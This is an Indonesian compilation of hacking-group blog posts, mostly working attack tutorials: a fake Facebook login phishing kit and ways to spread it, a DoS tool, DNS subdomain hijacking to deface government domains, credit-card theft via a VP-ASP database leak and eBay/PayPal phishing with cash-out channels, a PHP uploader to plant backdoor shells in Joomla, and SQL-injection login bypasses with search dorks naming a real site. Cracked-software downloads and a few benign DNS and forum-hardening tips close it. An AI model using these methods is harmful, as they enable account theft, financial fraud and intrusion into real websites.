PERTAMA: Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook, sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut, cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu yang mengatasnamakan facebook, link login palsu dan metode social engineering lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau memasukkan username dan password anda pastikan bahwa alamat url tersebut benar, jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian email yang mengatasnamakan facebook yang memancing anda agar login facebook yang masuk ke inbox anda, atau abaikan saja email tersebut.

KEDUA: Facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun. hampir-hampir saja facebook diharamkan. 

1. Silahkan anda daftar di http://www.united.net.kg/ atau http://www.globalweb.com.ru/hosting.php atauhttp://biz.ht/ mengapa saya suruh anda daftar disana ? di web hosting sana sangat gratis dan support php juga dari pada di ripway.com 
2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file index.html.(akan ada di Cpanelmasing2 nantinya) 
3. oke, kita mulai praktek kita. yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin silahkan download scriptnya dahulu DI SINI 
4. setelah anda download. Disana ada dua file sebut saja index dan write kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar. 
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ, klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu] 
6. alright! selesai sampai di sini. . . untuk penyebarannya silahkan dengan cara masing2… disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania.. buka file index di domain webhosting kalian..ambil URL nya..
7.  [penting] terus untuk pengguna firefox: buka tools>option>main preview:

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya. boleh di sebar ke komputer temen/di warnet2 kesayangan.

Kali ini GCA akan membagi script bagi anda yang memiliki pacar atau pasangan atau baru mau nembah heh
Dan sekarang saya akan bagikan script buat anda anda, anda tinggal memasukkan script berikut ini di hosting anda dan edit script foto dan kata kata yang telah ada di script ini

Demo : Klik Disini

Download : Klik Disini

Sekilas Script yang di ubah :

1. Script di atas silahkan anda ubah yang bertulisan For ????????? sesuai keinginanan anda

Klik Gambar Untuk Pembesar

1. https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9sZwk6fyWI_nbb0qgmcODffckQ64Qtq1-w2a1NtIjZ5x94MxTrQDXqooCV2Xu88wLpasPeeh-JBIM6_DYHCpRxRe7pMff476_2fKZO5T53HcYr3p8qzqajhD3P6IaRD7uyQCdMMTKb6N/s1600/invalid_url.gif (Script Gambar silahkan ubah dengan gambar yang anda inginkan)
2. Kata kata anda (Silahkan ganti sesuai kata kata anda yang anda inginkan )
3. I LOVE YOU ???????? ( Tanda ???????? silahkan ganti dengan nama org yang anda inginkan)
4. By. ??????????? ( Tanda ??????????? silahkan ganti dengan nama anda)

Note :
1. Bila Ingin Menambah Gambar Lagi silahkan Copy script seperti di bawah ini di desekitar script yang sama di fille script tadi :

<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9sZwk6fyWI_nbb0qgmcODffckQ64Qtq1-w2a1NtIjZ5x94MxTrQDXqooCV2Xu88wLpasPeeh-JBIM6_DYHCpRxRe7pMff476_2fKZO5T53HcYr3p8qzqajhD3P6IaRD7uyQCdMMTKb6N/s1600/invalid_url.gif" 
width="250px"><span>Kata kata anda</span>

2. Untuk memasang lagu seperti demo tadi silahkan ubah script yang anda download tadi cari kode seperti di bawah ini ( tekan ctrl f untuk pencarian cepat )

/* Lagu */
<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor" /><param value="mp3=http://pokus-id.bugs3.com/Kerispatih%20-%20Lagu%20Rindu.mp3?tsid=20120612-141516-4f878dd3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars" /></object>
</object>
/* lagu */

3. Dan Ubah Menjadi Seperti Di bawah ini

/* Lagu */
<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"><param value="#ffffff" name="bgcolor" /><param value="mp3=http://pokus-id.bugs3.com/cinta%20terakhir.mp3?tsid=20120612-141516-4f878dd3&amp;loop=1&amp;autoplay=1&amp;volume=125" name="FlashVars" /></object>
</object>
/* lagu */

Selamat Mencoba dan semoga berhasil :)

 

Kali ini Garuda Cyber Army akan share tools sederhana untuk melakukan DDoS Attack/Serangan DDoS
Tapi sebelum itu kita harus tau dulu apa yang dimaksud dengan Serangan DoS dan berikut sekilas penjelasannya

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang Țersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:

1. Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
2. Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
3. Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Gimana udah taukan apa itu serangan DoS dan sekarang silahkan download tools sederhana ini untuk melakukan serangan DoS

Download Tools

Cara Deface Dengan Metode DNS Afraid  - Oke, sekarang ane mau ngasih tutor DNS Afraid yang sangat heboh di dunia hacking wkwkwk
sebelumnya gw titip nama team aja " Garuda Cyber Army " :D

Pertama lu harus Daftar akun di:

000webhost dan afraid.org

Step 1
Kalau udah lu buat web di 00webhost

• Go to Cpanel 

• Buat index.php di FILE MANAGER "Public_html/upload/"

 

inti nya , buat aja folder upload :) trus upload index.html (terserah)

Oia ,,  di folder public_html .. ente upload index.html nya , dan isi dengan script deface :)

• Go to Park Domain 

Step 2

• Masuk ke afraid.org  

•  Klik Subdomains

 *ada dropbox klik "many many more available"

• Klik "Shared Domain Registry"

• Lalu Cari / Share *misal: .gov

• Pilih targetnya lalu klik dan kalian akan masuk ke Add a new subdomain

5.Isi Data Dengan Seperti ini

 Type : NS 

Subdomain : forums,info,data,profile seterah ente,ane ambil contoh Members

ingat : subdomain nya : members isi aja terserah ,itu tuh , gini : members.site.com  ,gitu , jadi members nya di ubah sesuai keinginan aja :)

domain : bengkayang.go.id (private) #ngga usah lu ganti lagi
Destination: "ns01.000webhost.com" atau "ns02.000webhost.com" (*) biasa nya yang "ns01.000webhost.com"
TTL : kosongin
Wildcard: (*) klik Centang

JADI ISI SEPERTI INI :

• Save.

Step 3

• Go to park domain di 000webhost

*jika sudah terdaftar disub domain anda seperti ini:

• dan masuk kan domain yang tadi members.site.com

• Lalu klik park domain
• Ada tulisan

"Domain [Domainanda] has been parked on top of [blabla] . The most important thing is that now you need to update nameservers of domain Domainanda to ns01.000webhost.com, ns02.000webhost.com
If you will not update nameservers, domain will be unparked in 7 days automatically." dan klik back park domain

• Berarti Sucses dan tunggu beberapa menit lalu buka Taraaaa...
• kalo gagal ,cari yang baru aja :)

Turtorial Hack CC (Credit Card) - Membobol situs Paypal dimana paypal adalah alat transaksi di dunia online, jika anda ingin membeli di ebay syarat utama yang harus di penuhi adalah harus mempunyai acount Paypal (PPL). Dan kali ini saya akan posting cara Credit Card Hack.

Mari kita mulai dengan beberapa istilah yang mudah.

Apa kartu kredit?

Kartu kredit dari dua jenis:

• Kartu Debit
• Kartu Kredit

1. Debit adalah untuk memiliki jumlah jumlah di dalamnya dan u dapat menggunakannya.2. Kredit berarti u memiliki batas kredit baris seperti sebesar $ 10000 dan u dapat menggunakan mereka dan dengan akhir bulan membayar ke bank.

Untuk menggunakan kartu kredit di internet u hanya tidak membutuhkan nomor cc dan kadaluwarsa tapi u perlu info banyak seperti:

• Nama
• Nama
• Alamat
• Kota
• Negara
• Zip
• Negara
• Telepon
• CC jumlah
• Kadaluwarsa
• CVV2 (ini 3digit kode keamanan di bagian belakang setelah panel tanda tangan). 

Jika Anda mendapatkan info bahwa Anda dapat menggunakannya untuk membeli hal apapun di internet, seperti lisensi perangkat lunak, keanggotaan situs porno, keanggotaan proxy, atau hal (layanan online biasanya, seperti webhosting, domain).

Jika ingin membuat uang $ melalui hacking maka Anda harus sangat beruntung ... Anda harus memiliki sebuah bank yang tepat dan bin untuk kas bahwa kartu kredit melalui mesin ATM.Mari saya jelaskan bagaimana?

Pertama mempelajari beberapa istilah sederhana.

BINS = 6 digit pertama dari setiap kartu kredit disebut "BIN" (misalnya jumlah cc adalah: 4121638430101157 kemudian bin adalah "412163"), saya harap ini mudah dipahami.

Sekarang pertanyaannya adalah bagaimana untuk menghasilkan uang melalui kartu kredit. Yang aneh ..., baik Anda cant melakukan itu, tetapi ada orang-orang tertentu di dunia yang bisa melakukan itu. Mereka menyebut diri mereka "kasir". Anda dapat mengambil beberapa waktu untuk menemukan kasir handal.Sekarang pertanyaannya adalah kartu kredit bank yang setiap cashable dan bin setiap cashable? Seperti citibank, bank america, MBNA .. semua bank cashables? Yah jawabannya adalah "TIDAK". Jika u tahu beberapa hal, hal kecil tentang sistem perbankan, telah u pernah mendengar apa yang mesin ATM? Di mana u menarik uang tunai ur dengan meletakkan kartu ur masukSetiap bank tidak memiliki ATM, setiap bank tidak mendukung ATM cashout mesin. Hanya sedikit bank mendukung dengan beberapa tempat sampah mereka (u know bin adalah 6 digit pertama dari setiap nomor kartu kredit / debit), untuk kira bank america. Bank yang tidak memiliki hanya 1 bin, bahwa bank diberikan seperti, 412345 412370 adalah sampah ur u dapat membuat kartu kredit pada mereka. Jadi bank yang membagi negara Citi lokasi bijaksana, seperti 412345-412360 adalah untuk amerika, setelah itu bagi orang luar dan seperti ini. Saya harap u mengerti. Jadi semua sampah dari bank yang sama bahkan tidak cashable, seperti untuk kira mereka mendukung ATM di New York dan tidak di California, jadi seperti tempat sampah dari California bank yang sama akan uncashable. Jadi selalu pastikan bahwa tempat sampah dan bank adalah 100% cashable di pasar dengan banyak kasir.

Pastikan kasir yang legit, karena kasir banyak r ada yang mengambil kartu kredit Anda dan merobek u off dan tidak mengirimkan share 50% kembali.Anda juga dapat menemukan beberapa kasir pada mIRC * (irc.unixirc.net / server: 6667) channel: # cashout, # ccpower

Nah, periksa situs web di mana u punya daftar tempat sampah dan bank sebagian besar 101% cashable. Jika u mendapatkan kartu kredit dari bank yang sama dengan bin sama, maka u dapat cashout jika tidak. Ingat untuk menggunakan kartu kredit di internet u tidak perlu PIN (4 kata sandi yang u masukkan dalam Mesin ATM), tapi untuk kebutuhan u cashout. Anda bisa mendapatkan pin hanya dengan Metode 2 hacking yang saya masih tidak posting tetapi saya akan. Metode pertama dari sql injection dan hacking shopadmin tidak memberikan dengan pin, hanya memberikan cc CVV2 mati rasa dan info lain yang biasanya perlu untuk belanja bukan untuk menguangkan.Hacking Kartu Kredit.

CC (Kartu Kredit) dapat hacked dengan dua cara:

• Penipuan Kartu Kredit (biasanya digunakan untuk mendapatkan uang, beberapa kali untuk belanja)
• Kartu Kredit Shopadmin Hacking (hanya untuk menyenangkan belanja,, pengetahuan di internet)

1. Shopadmin Hacking

Metode ini digunakan untuk menguji pengetahuan atau untuk mendapatkan kartu kredit untuk belanja di internet, atau iseng, atau cara apapun tetapi tidak untuk menguangkan (karena metode ini tidak memberikan PIN - 4 digit kode akses) hanya memberikan cc mati rasa, CVV2 dan info dasar lainnya.Shopadmins adalah dari perusahaan yang berbeda, seperti: VP-ASP, X Kereta, dll Tutorial ini untuk hacking VP-ASP TOKO.

Saya harap dilihat setiap kali u mencoba untuk membeli beberapa hal di internet dengan cc, mereka menunjukkan bentuk ua juga diprogram, sangat aman. Mereka gerobak, seperti vp-asp xcarts. Situs tertentu tidak hack, tapi gerobak yang hacked. Di bawah ini aku posting tutorial untuk hack VP ASP keranjang. Sekarang setiap situs yang menggunakan keranjang yang bisa hack, dan melalui mereka * file mdb u bisa mendapatkan 'rincian kartu kredit' klien mereka, dan juga masuk nama dan password admin area mereka, dan semua info lainnya dari klien dan rahasia company.

Mari kita mulai:

Jenis: VP-ASP Shopping CartVersi: 5.00

Bagaimana menemukan VP-ASP 5,00 situs?

Mencari VP-ASP 5,00 situs sangat sederhana ...

1. Pergi ke google.com dan ketik: VP-ASP Shopping Cart 5,002. Anda akan menemukan banyak situs dengan VP-ASP cart software 5,00 diinstalSekarang mari kita pergi ke mengeksploitasi ..

Halaman ini akan seperti ini: **** :/ / *** .victim.com / toko / shopdisplaycategories.aspMengeksploitasi adalah: diag_dbtest.aspSekarang Anda perlu melakukan ini: **** :/ / *** .victim.com / toko / diag_dbtest.asp

Sebuah halaman akan muncul yang berisi:

• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.

Contoh:
Yang paling penting di sini adalah xDatabasexDatabase: shopping140Ok, sekarang URL akan menjadi seperti ini: **** :/ / *** .victim.com/shop/shopping140.mdbJika Anda tidak men-download Database, coba ini sementara ada dblocation:xDblocationresxurl adalah: **** :/ / *** .victim.com/shop/resx/shopping140.mdb

Download file mdb dan Anda harus dapat membukanya dengan penampil file mdb, Anda harus dapat menemukan satu di download.com, atau menggunakan MS Office Access.Di dalam Anda harus dapat menemukan informasi kartu kredit, dan Anda bahkan harus bisa menemukan username dan password admin untuk website.

Halaman login admin biasanya terletak di sini: **** :/ / *** .victim.com / toko / shopadmin.aspJika Anda tidak dapat menemukan username dan password admin di file mdb atau Anda dapat tapi itu tidak benar, atau Anda tidak dapat menemukan file mdb sama sekali, kemudian mencoba untuk menemukan halaman login admin dan memasukkan password default yaitu:
Username: admin
password: admin ATAU
Username: vpasp
password: vpasp

2. Hacking Melalui PenipuanMetode ini biasanya digunakan untuk hack untuk mendapatkan uang. Apa yang terjadi dalam metode ini adalah Anda membuat halaman klon.

Sasaran: pada dasarnya eBay.com atau paypal.com untuk kartu kredit umum, atau jika u ingin menargetkan bank manapun cashable tertentu seperti regionbank.com kemudian u harus membuat halaman klon untuk bank itu.

Apa itu eBay.com?Its situs belanja di seluruh dunia yang digunakan oleh banyak miliar orang yang menggunakan kartu kredit mereka di ebay. Apa yang Anda lakukan membuat sebuah halaman yang sama sama seperti eBay dan meng-upload di beberapa hosting yang tidak memiliki batasan hukum, mencoba untuk menemukan hosting di Eropa mereka akan membuat penipuan Anda untuk waktu yang lama, dan email pengguna eBay.

Cara mendapatkan email dari pengguna mereka?Pergi ke google.com dan ketik "Email Harvestor" atau Spider Email dan mencari Pembeli Penjual eBay dan eBay dan u akan mendapatkan daftar panjang. Bahwa daftar ini tidak akurat tetapi dari 1000 minimal 1 email akan berlaku. Atleast Anda akan mendapatkan beberapa waktu.

Nah u membuat halaman klon dari ebay, dan pesan u membuat daftar dari laba-laba dengan pesan, seperti "Account Anda telah hacked", atau alasan yang terlihat profesional, dan meminta mereka untuk mengunjungi link di bawah ini dan masukkan informasi penagihan Anda, dan halaman penipuan memiliki program ketika mereka memasuki info mereka datang langsung ke email Anda.Pada halaman formulir u memiliki PIN diperlukan agar u juga mendapatkan nomor PIN melalui mana u dapat uang tunai melalui ATM ..

Sekarang jika jangka ebay scam atau penipuan paypal, sampai dengan keberuntungan Anda siapa korban Anda. Seorang klien dari bank amerika atau citibank atau daerah, tentang keberuntungan nya, mungkin u mendapatkan cashable, mungkin u tidak hanya keberuntungan nya, ada yang lain.Cari di google untuk men-download situs scam dan mempelajarinya!

Setelah Anda membuat situs scam Anda, hanya menemukan beberapa harvestor email atau laba-laba dari internet (download yang bagus di Superstore Software Email Massal - Pemasaran Internet Advertising Email) dan membuat daftar email yang baik.

Dan Anda perlu menemukan mailer (massa mengirim mailer) yang mengirim massa - email ke semua email dengan pesan memperbarui account mereka pada halaman penipuan ur).
Dalam dari, gunakan eBay@reply3.ebay.com email dan digunakan Judul: eBay - Update Rekening eBay Anda dan di eBay penggunaan Nama

Beberapa Petunjuk:

1. Pastikan hosting anda tetap up atau link dalam email u akan mengirim, dan ketika email korban Anda mengunjunginya, ia akan menampilkan halaman tidak dapat ditampilkan, dan rencana Anda akan gagal.
2. Titik yang paling sulit adalah mencari hosting yang tetap di scam. bahkan saya tidak menemukannya dengan mudah, bagian yang sangat sangat keras.
3. Mungkin u harus kontak dengan seseorang yang memiliki perusahaan hosting dan lokasi rekan atau dedicated ia dapat menyembunyikan penipuan Anda dalam beberapa didedikasikan tanpa pembatasan.
4. Mencari daftar email yang baik (cara yang baik = benar-benar pengguna)5. Anda massal mailing perangkat lunak tanah email di inbox pengguna.

Penting: kartu kredit Hacking adalah tindakan ilegal, ini hanya posting informasi dan saya tidak bertanggung jawab atas tindakan yang dilakukan oleh Anda setelah membaca tutorial ini. Posting ini adalah untuk tujuan pendidikan saja.

Hallo sobat Gca :)
huh ,, pernah kan pas nanem shell ,pas klik symlink , wah ada ratusan ,tapi 404 not found semua :(
 hemm
etss jangan khawatir , di sini ane bakal share  cara mengatasi nya yaitu dengan shell cim.php (thx for surabaya black hat )
 silahkan download dulu : >>DOWNLOAD<<
 ok cekidot tutornya
1. upload shell cim.php
2. buka cim.php
3. klik tab (pada keyboard ) lalu isi password surabayablackhat
4. klik PHP.INI http://prntscr.com/2l96tw
5. trus klik "DONE Open this link in new tab to run PHP.INI" ( di tab baru )
6. biar kan ,jangan tutup tab nya
7. coba kembali ke shell ,klik symlink nya
8. selesai




note : jika symlink can't read/named/conf blablabla 
itu beda dengan tutor ini

Kali ini GCA akan share yaitu Exploit Joomla. Exploit Joomla di gunakan untuk melakukan tehnik Com_User dan Exploit Joomla yang akan anda download nanti telah saya tambahkan dork serta Script Upload yang bisa di gunakan untuk mengupload shell atau sejenisnya dengan cara menaruh script tersebut di template website tersebut :)

Berikut Link Download  Exploit Joomla :

Download

Password zip : GCA

Download Shell Backdoor GCA

Download Shell Backdoor GCA - buat anda suka deface pasti sudah tau tentang Backdoor "pintu belakang" alias jalan pintas buat akses log on situs web, gak cuma itu sih kita juga bisa leluasa kalo mengexploitasi web dengan menggunakan Backdoor ( shell ) tanpa harus login sebagai administrator kita punya kuasa yang sama dengan admin aslinya.

Sekarang Silahkan Download Shellnya di bawah ini :

Download

 Oke ,, Hi sobat Gca
Semoga kalian tetep semangat :)
nih ane bakal share Cara Memasang / menanam shell di joomla . Nah kmarin kan sudah di post Cara deface web dengan com_user , kalu belum tau klik disini
dan dork nya bisa di sini

Bagaimana cara menebas index di web joomla? ada dua cara untuk menebas index di web joomla. yang pertama ke template manager lalu ganti script web tersebut dengan sript deface kamu. yang kedua dengan memasang shell lalu tebas index.php nya. Dan kali ini saya akan menjelaskan cara yang kedua, yaitu cara menanam/memasang shell di web Joomla.

Bahan : shell (
Langkah-Langkah:
1. Login ke halaman Administrator ( site.com/administrator ).

*Site.com nya di ganti ama site yang akan di tanami shell
2. Klik menu Template Manager yang terdapat di halaman utama.

3. Lihat Template Administrator yang aktif ( Yang aktif terdapat tanda bintang ). lalu klik tombol Templates
.

4. Klik pada judul Template Administrator yang aktif tadi.

5. Klik pada tulisan Edit Main Page Templates.

6. Taruh Script ini di bawah Script halaman Administrator. dan save.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>

7. Setelah Save berhasil, akan muncul fasilitas untuk mengupload shell. ( terdapat di paling bawah halaman administrator ). Lalu pilih file shell kamu lalu upload .

8. Masuk ke dalam shell kamu ( site.com/administrator/Nama shell kamu.php ) Lalu cari tulisan index.php dan klik pada tombol edit
*Tulisan berwarna merah harus di ganti.
lalu cari pindah kamar , lihat gambar

 
 intinya , klik saja sebelum administrator

9.lalu cari index.php

lalu hapus smua , dan paste kan dengan script deface mu :)

Terkadang pada saat kita memasukkan FD ( FalshDisk ) kita menemukan fille/folder Autorun.inf yang di deteksi oleh antivirus kita akan tetapi fille/folder Autorun.inf tersebut tidak bisa terhapus menggunakan antivirus kita dan sekarnag saya akan bebrbagi aplikasi sederhana yang penggunaannya sangat mudah yang dapat menghapus fille/folder autorun.inf

Download

• Penghapus Folder AutoRun.inf
• Password  :   

memanfaatkan eror pada sql website tersebut, kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat oleh pemilik/admin.

Dork yang dapat digunakan sebagai berikut :

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/

Berikut Tutorialnya/Langkah Langkahnya :

• Silahkan masukkan dork tersebut ke google ( pilih salah satu ) : 
• Lalu pilih target, contohnya seperti target berikut : http://www.hotairballoonridescolorado.com/adminpanel.php
• Setelah Itu jika anda telah mendapatkan target silahkan anda coba login dengan menggunakan 

username :  ' or 1=1 limit 1 -- -+ 
password  : ' or 1=1 limit 1 -- -+

Screenshot :

• Jika anda telah masuk adminnya maka anda telah berhasil

Connectify Hotspot Pro adalah software yang berfungsi untuk membuat komputer atau laptop sobat sebagai Access Point, sehingga dapat menyebarkan koneksi internet melalui Wi-Fi. Connectify Hotspot Pro ini juga dilengkapi dengan Connectify Dispatch, yang berfungsi untuk menggabungkan koneksi internet, sehingga koneksi internet kita menjadi lebih cepat. Software ini juga memiliki interface yang cukup simple, dan tidak akan membingungkan penggunanya.

Screenshot

Download

• Connectify Hotspot Pro 7.2
• Patch
• Password  :     |   Status  :  Tested (Windows 8.1, Windows 7)

Tutorial Install :

1. Install Connectify seperti biasa, kemudian Restart PC sobat.
2. Copy "Patch Connectify Hotspot Pro 7.2.exe" dari dalam folder Patch, kemudian paste di folder instalasi Connectify.
3. ex : C:\Program Files\Connectify\
4. Buka "Patch Connectify Hotspot Pro 7.2.exe", kemudian klik Activate PRO.
5. Tunggu sekitar 1 menit, kemudian buka Connectify.
6. Jika muncul halaman login, close saja.
7. Selesai.

Acunetix Web Vulnerability Scanner 9 Full Crack - Keamanan Website adalah aspek yang mungkin paling diabaikan saat ini. Seharusnya tingkat keamanan pada sebuah website harus menjadi prioritas dalam hal apapun. Acunetix Web Vulnerability Scanner merupakan sebuah aplikasi scanner yang mana berfungsi untuk menguji keamanan web anda. aplikasi ini otomatis memeriksa aplikasi web Anda terhadap celah SQL Injection, XSS & kerentanan web lainnya. Denngan begitu anda kana mengetahui kelemahan security yang ada di web anda dan kemudian segera memperbaikinya lagi.

Download

• Acunetix Web Vulnerability Scanner 9 Full Crack
• Password  :   

Tutorial install

1. Install Acunetix
2. Copy crack ke C:\Program Files\Acunetix

Sekilas Tampilan Shellnya

Download

• ShelL GCA
• Password  :   

Kali ini saya akan berbagi Tutorial Konfigurasi DNS Server Pada Debian, tutorial ini adalah sebuah dasar dalam pembuatan DNS Server, jika tertarik membacanya silahkan simak di bawah ini.

1. Install pake bind9
   #apt-get install bind9

2. Buat file konfigurasi
   - db.ip       <- /etc/bind
   - db.domain   <- /etc/bind
   - named.conf  <- /etc/bind
   - resolv.conf <- /etc

3. Edit file konfigurasi

   #pico /etc/bind/db.ip
   $TTL 68400
   @ IN SOA namadomain.com. root.namadomain.com. (
1
2
3
4
5 )
   @ IN NS     namadomain.com.
   1 IN PTR         ns1.namadomain.com.
   1 IN PTR  www.namadomain.com.
   1 IN PTR  sql.namadomain.com.
   1 IN PTR  ftp.namadomain.com.
   1 IN PTR  vpn.namadomain.com.

   #pico /etc/bind/db.domain
   $TTL 68400
   @ IN SOA namadomain.com. root.namadomain.com. (
1
2
3
4
5 )
   @   IN NS namadomain.com.
   @   IN A 192.168.0.1
   ns1 IN A 192.168.0.1
   www IN A 192.168.0.1
   sql    IN A 192.168.0.1
   ftp  IN A 192.168.0.1
   vpn IN A 192.168.0.1
   @ IN AAAA ::1

   #pico /etc/bind/named.conf
   zone "namadomain.com"{
type master;
file "/etc/bind/db.domain";
   };
   zone "0.168.192.in-addr.arpa"{
type master;
file "/etc/bind/db.ip";
   };

   #pico /etc/resolv.conf
   nameserver 192.168.0.1

4. Restart

   #invoke-rc.d bind9 restart  atau #/etc/init.d/bind9 restart

Keterangan : 

• 192.168.0.1 : ganti dengan ip server anda sendiri
• 0.168.192 : ganti sesuai kelas ip yang anda gunakan dan cara penulisan terbalik contoh 192.168.0 menjadi 0.168.192
• namadomain.com : Bisa anda ganti dengan alaman website anda yang ingin di buat
• 1      IN PTR         ns1.namadomain.com.
  1 IN PTR  www.namadomain.com.
  1 IN PTR  sql.namadomain.com.
  1 IN PTR  ftp.namadomain.com.
  1 IN PTR  vpn.namadomain.com. (Ganti angka 1 dengan angka terakhir pada ip server anda contoh 172.16.2.37 maka ip yang di tulis adalah 37

Cara Ampuh dan Mudah Untuk Menghilangkan SSID wifi.id pada Modem Speedy - SSID wifi.id pada modem speedy dikhawatirkan mengancam keamanan pengguna (pelanggan) speedy.

Contoh wifi punya saya yang belum saya matikan SSID wifi.id

Dan jika anda ingin mematikan atau menghilangkan SSID wifi.id pada modem speedy anda silahkan ikuti langkah di bawah ini  :

• Download Putty
• Konek ke IP modem anda (default adalah 192.168.1.1) dengan memilih protokol TELNET.
• Setelah itu ketikkan password modem anda
• Setelah itu Ketikkan perintah rtwlan setbssidnum 1  ( Perintah ini untuk mendisable fitur multi SSID, sehingga hanya ada 1 saja yang aktif )

• Lalu Enter

Dan hasilnya akan seperti ini, hanya ada satu wifi yang aktif

Sekian

Berikut ini adalah sedikit tips tentang Cara Membuat Tampilan CMD (command prompt) Transparan Seperti Terminal Pada Linux

Langsung saja ke cara pembuatannya

- Download dulu aplikasi  : Klik Disini

- Jika selesai lakukan ekstrak file kemudian rename file yang bernama console.exe menjadi cmd2.exe

- Selanjutnya copy semua isi file dalam folder console2 kemudian paste pada C:/windows/system32
 (hal ini bertujuan untuk mempermudah pemanggilan aplikasi pada menu run seperti halnya pada saat pemanggilan perintah cmd bawaan windows)

- Untuk mengujicoba pemanggilan aplikasi tekan tombol kombinasi Windows + R atau masuk ke menu RUN kemudian ketik cmd2

- Setelah layar cmd2 tampil, lakukan pengaturan dengan cara klik pada menu view-edit-setting kemudian masuk pada tab appearance-more, pada layar sebelah kanan berikan centang pada Windows transparency dan pilih alpha,

- kemudian atur active windows sesuai keinginan anda.

1.Password yang kuat
Bukan cuma obat saja yang kuat, tapi password juga harus kuat. Saya rasa temen2 di sini sudah lebih ahli dalam masalah crack2 password, pasti sudah lebih ngerti. Yah intinya pastikan password anda memiliki minimal 8 karakter dng kombinasi angka, huruf dan karakter spesial.

2. Cek CHMOD permission
cek CHMOD kalian seperi di bawah ini :

Required – ./inc/settings.php – 666
Required – ./inc/config.php – 666 (install) 444 (after installation)
Required – ./cache/ – 777
Required – ./cache/themes/ – 777
Required – ./uploads/ – 777
Required – ./uploads/avatars/ – 777
Optional – ./admin/backups/ – 777
Optional – ./inc/languages/*language*/*all files*/ – 666
Optional – ./inc/languages/*language*/admin/*all files*/ – 666

3. Lindungi file Config.php
 Buat file .htaccess pada direktori /inc lalu masukan kode dibawah ini :

<files config.php>
Order deny,allow
deny from all
</files>

4. Lindungi halaman admin dng .htaccsess.
Pada bagian ini boleh di ikuti boleh tidak karna agak beresiko. Kita akan membuat aturan dalam .htaccess agar hanya IP tertentu saja yang bisa mengakses halaman admin. Ini mungkin cara yang sangat mantap utk melindungi halaman admin, tapi ingat… bisa saja sewaktu-waktu anda tidak bisa OL di komputer sendiri misalnya, dan terpaksa OL di warnet… nah loh? gimana? hehe… tp ggp, ttp akan saya share kok. Oke, buat file .htaccess di dalam direktori ./admin, lalu isikan kode berikut

RewriteEngine On
RewriteBase /
RewriteCond %{REMOTE_HOST} !^12\.345\.678\.9
RewriteRule .* http://www.URL KAMU.com [R=301,L]

Di situ ada warna hijau , ganti dng IP kamu, dan yg warna merah ganti dng alamat dimana orang orang lain akan di alihkan jika IP nya tidak match. Sedangkan utk multi admin atau multi IP, ini kode nya:

ErrorDocument 403 http://www.URL KAMU.comOrder deny,allow
Deny from all
Allow from 123.45.67.899
Allow from 998.76.54.321

Aturan nya masih sama dengan yang sebelum nya. Paham kan?

5. mengubah direktori admin.
masuk ke /inc/config.php lalu cari kode dibawah ini :

$config['admin_dir'] = 'admin';

ganti 'admin' dengan direktori admin yang baru
setelahitu masuk ke public_html dan rename direktori admin dengan yang tadi di config.php

6. menyembunyikan link Admin Control Panel (ACP).
bila dalam ke adaan default mybb akan menampilkan ACP,nah biar hacker gak tau admin dirnya dimna hrus di sembunyikan.Caranya :
masuk ke /inc/config.php lalu cari kode dibawahini:

$config['hide_admin_links'] = 0;

Lalu ganti 0 menjadi 1

$config['hide_admin_links'] = 1;

simpan

7. Matikan HTML dalam posting
